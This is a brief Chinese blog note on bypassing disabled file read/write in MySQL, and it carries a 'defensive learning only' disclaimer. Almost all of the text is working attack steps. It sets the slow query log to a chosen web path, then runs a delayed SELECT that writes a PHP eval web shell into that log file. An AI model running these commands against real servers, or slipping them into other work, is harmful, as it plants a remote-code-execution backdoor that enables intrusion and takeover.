【笔记】Mysql禁用读写绕过 发表于 2023-04-27 更新于 2024-05-18 阅读次数: 前言Mysql禁用读写绕过 本文仅用于网络信息防御学习 正文 启用满日志记录 <dir>:日志存储路径,作为Shell命令执行路径 12SET GLOBAL SLOW_QUERY_LOG = 1;SET GLOBAL SLOW_QUERY_LOG_FILE = '<dir>'; 向日志内写入后门 1SELECT '<?php eval($_REQUEST['<pwd>']);?>' OR SLEEP(11); 完成参考文献哔哩哔哩——逆风微笑的代码狗